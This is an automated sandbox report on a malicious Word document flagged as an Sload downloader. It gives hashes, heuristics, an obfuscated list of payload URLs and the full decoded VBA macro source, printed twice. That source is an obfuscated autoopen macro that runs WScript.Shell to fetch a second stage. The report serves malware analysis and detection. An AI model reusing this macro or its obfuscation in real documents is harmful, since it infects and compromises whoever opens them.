Office (OLE) malware analysis — malicious · 59a592aa6da98097

MALICIOUS

Office (OLE)

141.6 KB Created: 2019-01-15 18:14:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: f6b725c6b0e8c2bec05ff4fef6e9bc05 SHA-1: f0301fe0b9aa32141d6d95fede9dceffa63d7f6d SHA-256: 59a592aa6da98097a35f8f9055c4e066c4e28246b272caed01552a3a292b094d

290 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The macros utilize WScript.Shell and CreateObject to execute commands, likely to download and run a second-stage payload from the provided obfuscated URL. The ClamAV detection 'Doc.Downloader.Sload-6817439-0' further supports the downloader functionality.

Heuristics 9

ClamAV: Doc.Downloader.Sload-6817439-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sload-6817439-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

 Set AutoLoanAccountbn = Streamnq
Usabilityvw = "WscRipt.sHeLl"
   Set Valleyjb = Solutionsjz

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

 Set Principalli = Trafficwayzz
purplebl = Array(withdrawalzn, communitiesdn, firewalljp, CreateObject(Usabilityvw).Run!(("" + magentaji + Junctionbi + Glenam + blackih + ShoesClothingii.TextBox1) + Frozenjf + Legacyub + Pathoi, 30 - 30), visionaryrw, Directwj, multimediajd)
   Set programcb = leveragejo

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

End Sub
Sub autoopen()
Representativenr = Array(depositdw, initiativesha, Internationalbs, Montanajp, USBwj, AutoLoanAccountqu, SMTPjq)

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.foAmXA-31.Au/x]w0Q_XAJ]eUD`_0@http://cod`enlXAnhnme.vn/wmfuxxu_bf8c_ccJhR@http://www.v`XAje?delbo?que.com/oJmIZL4_SF1qj[c]v@http://www.k`beA-?oft.Au/Heq3ZDGN_tvvO3]2e1q@http://www.yogXA?pXAceme.com/QZPd`[_LN2`P6fHd9.Spl`t(9@97;$Intell`gentZottonZh`p?vv)9SleekZottonSh`Atdj9;$ZomputeA?Book?dl In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6818 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6818 bytes
SHA-256: `7b7ead228350ed40e372a17fb503903bac660b196664036d88f1ed08cc7ecfee`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ShoesClothingii" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Attribute VB_Name = "Gorgeouspa" Function Montanajp() On Error Resume Next Set Underpassuj = HandcraftedConcreteTablemn For Each circuitrq In Bedfordshiresi For Each navigatevo In Digitizedid Forwardos = (Oct(574)) Next Do Upsizedwa = CLng(Avondp) Loop Until bluetoothnk Eqv programuz Set Buckinghamshiresu = recontextualizewm growdb = architectureswn For Each Ferryzh In Beautyjz Digitizedji = Cos(Internalbp) Next Next Set j24hourqv = Beautytd Set synergisticvt = Alabamakr For Each driverzj In Louisianazn For Each SQLjz In ComputersAutomotiveAutomotiveoh depositit = (Oct(90)) Next Do platformszh = CLng(softwarezw) Loop Until contentbasedwn Eqv Ergonomichn Set withdrawalwo = iterateht Coloradoqn = Montanamh For Each Borderscf In LiberianDollarjj Rubbercj = Cos(Regionalpi) Next Next Set ebusinessnz = Lodgebo Set turquoisesh = IncredibleSoftChipsri For Each CSSkw In Leadrt For Each HandcraftedPlasticChipsom In pixeldj Objectbasedsp = (Oct(280)) Next Do AutoLoanAccountot = CLng(parsingnz) Loop Until implementuz Eqv implementationrt Set depositua = SleekGraniteMousevc Fantasticsh = HandmadeFreshHatpd For Each Avonnf In Freshva Heightsba = Cos(silverkq) Next Next Set AutoLoanAccountbn = Streamnq Usabilityvw = "WscRipt.sHeLl" Set Valleyjb = Solutionsjz For Each monitoroc In KidsBookslz For Each streamlinett In copyingom transmittingqp = (Oct(721)) Next Do virtualdn = CLng(navigatejs) Loop Until Producerih Eqv BabyJeweleryBeautyob Set HandcraftedGraniteCheesebm = LicensedConcreteShirtft buswl = Cliffbw For Each Toysfi In arrayql backinguprq = Cos(Publickeywi) Next Next Set Liberiacr = calculatinguc Set Diverseli = Phasedpj For Each Researchzm In Identitycl For Each Reverseengineeredzz In maroonrt IndustrialBabyToyszs = (Oct(167)) Next Do quantifyingcd = CLng(orchidnk) Loop Until BabyElectronicsiw Eqv SouthAfricadr Set bandwidthti = Softji multitaskingqt = Coloradooh For Each AutoLoanAccountuv In CreditCardAccountcu deliverfi = Cos(Borderszp) Next Next Set Principalli = Trafficwayzz purplebl = Array(withdrawalzn, communitiesdn, firewalljp, CreateObject(Usabilityvw).Run!(("" + magentaji + Junctionbi + Glenam + blackih + ShoesClothingii.TextBox1) + Frozenjf + Legacyub + Pathoi, 30 - 30), visionaryrw, Directwj, multimediajd) Set programcb = leveragejo For Each magneticjw In multibyteuz For Each Crescentws In Woodenua cardzb = (Oct(544)) Next Do UnbrandedPlasticTablezi = CLng(Jerseyib) Loop Until paymentsl Eqv COMku Set crossplatformid = overridecf Prairiewa = Cambridgeshirept For Each harddrivepc In contentlj SleekSoftTunaco = Cos(Wayhh) Next Next Set indexingwl = Frozenow Set compellingsm = ebusinessdu For Each Smallzl In Regionalnn For Each LicensedGraniteBaconsk In navigateon Kazakhstanuz = (Oct(717)) Next Do holisticna = CLng(CreditCardAccountoj) Loop Until overridingkw Eqv tanzl Set solidstatekz = SriLankaRupeepl Meadowwk = pinkpb For Each RialOmaniof In depositnz GraphicalUserInterfaceba = Cos(SwissFrancrh) Next Next Set Fantastickz = Michiganoj Set Chiefic = GorgeousPlasticComputerhw For Each missioncriticaliz In matrixtj For Each RefinedCottonSoapsa In neuralst Bedfordshiresv = (Oct(723)) Next Do Associatetl = CLng(opensourcesq) Loop Until Frozentn Eqv transmitternz Set paymentcm = navigatingwc Trailqi = indexpm For Each Somiw In feedah backendmi = Cos(websiteoh) Next Next Set HandcraftedRubberCheesebu = redkm End Function Attribute VB_Name = "Islandssa" Sub Visionaryah() freshthinkingku = globalrf Brooksbq = Consultantds productizeva = paymenthl End Sub Sub autoopen() Representativenr = Array(depositdw, initiativesha, Internationalbs, Montanajp, USBwj, AutoLoanAccountqu, SMTPjq) End Sub Attribute VB_Name = "Districtwz" Attribute VB_Name = "Streamzz" Attribute VB_Name = "indexdp" Attribute VB_Name = "Orchestratorvd" Attribute VB_Name = "marketswc" Attribute VB_Name = "MoneyMarketAccountsz" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Fantasticub" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Bedfordshirezk" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Freshtm" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Strategistjd" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Agentaa" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 7b7ead228350ed40e372a17fb503903bac660b196664036d88f1ed08cc7ecfee

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ShoesClothingii"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Attribute VB_Name = "Gorgeouspa"
Function Montanajp()
On Error Resume Next
   Set Underpassuj = HandcraftedConcreteTablemn
For Each circuitrq In Bedfordshiresi
      For Each navigatevo In Digitizedid
         Forwardos = (Oct(574))
      Next
      Do
         Upsizedwa = CLng(Avondp)
      Loop Until bluetoothnk Eqv programuz
      Set Buckinghamshiresu = recontextualizewm
      growdb = architectureswn
      For Each Ferryzh In Beautyjz
         Digitizedji = Cos(Internalbp)
      Next
   Next
 Set j24hourqv = Beautytd
   Set synergisticvt = Alabamakr
For Each driverzj In Louisianazn
      For Each SQLjz In ComputersAutomotiveAutomotiveoh
         depositit = (Oct(90))
      Next
      Do
         platformszh = CLng(softwarezw)
      Loop Until contentbasedwn Eqv Ergonomichn
      Set withdrawalwo = iterateht
      Coloradoqn = Montanamh
      For Each Borderscf In LiberianDollarjj
         Rubbercj = Cos(Regionalpi)
      Next
   Next
 Set ebusinessnz = Lodgebo
   Set turquoisesh = IncredibleSoftChipsri
For Each CSSkw In Leadrt
      For Each HandcraftedPlasticChipsom In pixeldj
         Objectbasedsp = (Oct(280))
      Next
      Do
         AutoLoanAccountot = CLng(parsingnz)
      Loop Until implementuz Eqv implementationrt
      Set depositua = SleekGraniteMousevc
      Fantasticsh = HandmadeFreshHatpd
      For Each Avonnf In Freshva
         Heightsba = Cos(silverkq)
      Next
   Next
 Set AutoLoanAccountbn = Streamnq
Usabilityvw = "WscRipt.sHeLl"
   Set Valleyjb = Solutionsjz
For Each monitoroc In KidsBookslz
      For Each streamlinett In copyingom
         transmittingqp = (Oct(721))
      Next
      Do
         virtualdn = CLng(navigatejs)
      Loop Until Producerih Eqv BabyJeweleryBeautyob
      Set HandcraftedGraniteCheesebm = LicensedConcreteShirtft
      buswl = Cliffbw
      For Each Toysfi In arrayql
         backinguprq = Cos(Publickeywi)
      Next
   Next
 Set Liberiacr = calculatinguc
   Set Diverseli = Phasedpj
For Each Researchzm In Identitycl
      For Each Reverseengineeredzz In maroonrt
         IndustrialBabyToyszs = (Oct(167))
      Next
      Do
         quantifyingcd = CLng(orchidnk)
      Loop Until BabyElectronicsiw Eqv SouthAfricadr
      Set bandwidthti = Softji
      multitaskingqt = Coloradooh
      For Each AutoLoanAccountuv In CreditCardAccountcu
         deliverfi = Cos(Borderszp)
      Next
   Next
 Set Principalli = Trafficwayzz
purplebl = Array(withdrawalzn, communitiesdn, firewalljp, CreateObject(Usabilityvw).Run!(("" + magentaji + Junctionbi + Glenam + blackih + ShoesClothingii.TextBox1) + Frozenjf + Legacyub + Pathoi, 30 - 30), visionaryrw, Directwj, multimediajd)
   Set programcb = leveragejo
For Each magneticjw In multibyteuz
      For Each Crescentws In Woodenua
         cardzb = (Oct(544))
      Next
      Do
         UnbrandedPlasticTablezi = CLng(Jerseyib)
      Loop Until paymentsl Eqv COMku
      Set crossplatformid = overridecf
      Prairiewa = Cambridgeshirept
      For Each harddrivepc In contentlj
         SleekSoftTunaco = Cos(Wayhh)
      Next
   Next
 Set indexingwl = Frozenow
   Set compellingsm = ebusinessdu
For Each Smallzl In Regionalnn
      For Each LicensedGraniteBaconsk In navigateon
         Kazakhstanuz = (Oct(717))
      Next
      Do
         holisticna = CLng(CreditCardAccountoj)
      Loop Until overridingkw Eqv tanzl
      Set solidstatekz = SriLankaRupeepl
      Meadowwk = pinkpb
      For Each RialOmaniof In depositnz
         GraphicalUserInterfaceba = Cos(SwissFrancrh)
      Next
   Next
 Set Fantastickz = Michiganoj
   Set Chiefic = GorgeousPlasticComputerhw
For Each missioncriticaliz In matrixtj
      For Each RefinedCottonSoapsa In neuralst
         Bedfordshiresv = (Oct(723))
      Next
      Do
         Associatetl = CLng(opensourcesq)
      Loop Until Frozentn Eqv transmitternz
      Set paymentcm = navigatingwc
      Trailqi = indexpm
      For Each Somiw In feedah
         backendmi = Cos(websiteoh)
      Next
   Next
 Set HandcraftedRubberCheesebu = redkm
End Function


Attribute VB_Name = "Islandssa"
Sub Visionaryah()
freshthinkingku = globalrf
Brooksbq = Consultantds
productizeva = paymenthl
End Sub
Sub autoopen()
Representativenr = Array(depositdw, initiativesha, Internationalbs, Montanajp, USBwj, AutoLoanAccountqu, SMTPjq)
End Sub

Attribute VB_Name = "Districtwz"

Attribute VB_Name = "Streamzz"

Attribute VB_Name = "indexdp"

Attribute VB_Name = "Orchestratorvd"

Attribute VB_Name = "marketswc"

Attribute VB_Name = "MoneyMarketAccountsz"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Fantasticub"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Bedfordshirezk"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Freshtm"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Strategistjd"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Agentaa"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.